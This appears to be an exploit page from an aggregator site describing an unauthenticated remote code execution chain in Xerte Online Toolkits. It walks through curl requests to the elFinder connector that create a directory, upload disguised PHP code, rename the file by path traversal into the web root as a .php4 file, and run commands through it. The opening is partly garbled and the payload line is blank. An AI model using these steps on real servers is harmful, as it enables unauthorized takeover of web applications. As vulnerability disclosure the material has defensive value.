Exploit for xerteonlinetoolkits-rce

Name: Exploit for xerteonlinetoolkits-rce
Rating: 5 (2 reviews)
2026-03-23 | CVSS 6.2
## https://sploitus.com/exploit?id=0CBCF367-9831-5537-A712-27F3921E0B97
# Xerte Online Toolkits  '/(readme\.txt)|\.(html|php|php5|php*|phtml|phar|inc|py|pl|sh)$/i',
    'read'   => false,
~~~

The `php*` regex only matches the preceding character. Therefore it would match the following "ph", "php", "phppp", etc...

## Chained Attack Vector Reproduction Steps

### Unauthenticated Remote Code Execution

If authentication is enabled (which is not the default Xerte configuration) then an attacker must know (or brute force for) a valid user's username. If Guest authentication is used (the default), then the target project directory would simply be 1--Nottingham.

An unauthenticated attacker can create a directory "example_dir" and upload a "file.txt" file with malicious PHP code to any project directory under USER-FILES/

They can then use the Relative Path Traversal and Incomplete List of Disallowed Inputs vulnerabilities present in Xerte to perform path traversal by changing the uploaded filename to "example_dir/../../../../file.php4", moving file.txt to the application root as "file.php4", giving the attacker remote code execution.

1. Retrieve the full application root filepath

~~~bash
curl 'http://localhost/xt/setup'
~~~

2. Create the directory

Request Params:
    uploadDir: Application root + USER-FILES/{project id}-{user}-Nottingham/
    uploadURL: URL to the project directory
    cmd: mkdir
    name: The new directories name
    target: The media/ directories elfinder id. Because this is the elfinder root, it will always be "l1_Lw"

~~~bash
curl 'http://localhost/xt/editor/elfinder/php/connector.php?uploadDir=/opt/lampp/htdocs/xt/USER-FILES/1-user2-Nottingham/&uploadURL=http://localhost/xt/USER-FILES/1-user2-Nottingham/&cmd=mkdir&name=folder1&target=l1_Lw'
~~~

3. Upload malicious php file

*The  tag in the payload prevents the elfinder MIME type filter from detecting PHP code.

Request Params:
    uploadDir: Application root + USER-FILES/{project id}-{user}-Nottingham/
    uploadURL: URL to the project directory
    cmd: upload
    target: The media/ directories elfinder id. Because this is the elfinder root, it will always be "l1_Lw"
    upload[]: The file to be uploaded.

~~~bash
echo '' > file.txt
curl -X POST 'http://localhost/xt/editor/elfinder/php/connector.php?uploadDir=/opt/lampp/htdocs/xt/USER-FILES/1-user2-Nottingham/&uploadURL=http://localhost/xt/USER-FILES/1-user2-Nottingham/' \
    -F 'cmd=upload' \
    -F 'target=l1_Lw' \
    -F "upload[]=@file.txt;type=text/plain"
~~~

4. Generate the elfinder id for the new file

~~~bash
echo -n 'file.txt' | base64
ZmlsZS50eHQ=
~~~

Ensure you trim the padding, in this case its just "="

Add the volume identifer. This will always be "l1" (as in "/")

Result: `l1_ZmlsZS50eHQ`

5. Rename the file and perform Relative Path Traversal

Request Params:
    uploadDir: Application root + USER-FILES/{project id}-{user}-Nottingham/
    uploadURL: URL to the project directory
    cmd: rename
    name: The directory name, path traversal sequence, and new file name with .php4 extension
    target: The elfinder id we generated from the new File `l1_ZmlsZS50eHQ`

~~~bash
curl 'http://localhost/xt/editor/elfinder/php/connector.php?uploadDir=/opt/lampp/htdocs/xt/USER-FILES/1-user2-Nottingham/&uploadURL=http://localhost/xt/USER-FILES/1-user2-Nottingham/&cmd=rename&name=folder1%2F..%2F..%2F..%2F..%2Fs.php4&target=l1_ZmlsZS50eHQ'
~~~

6. Verify code execution

Request Params:
    cmd: The command to run

~~~bash
curl http://localhost/xt/s.php4?cmd=id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
~~~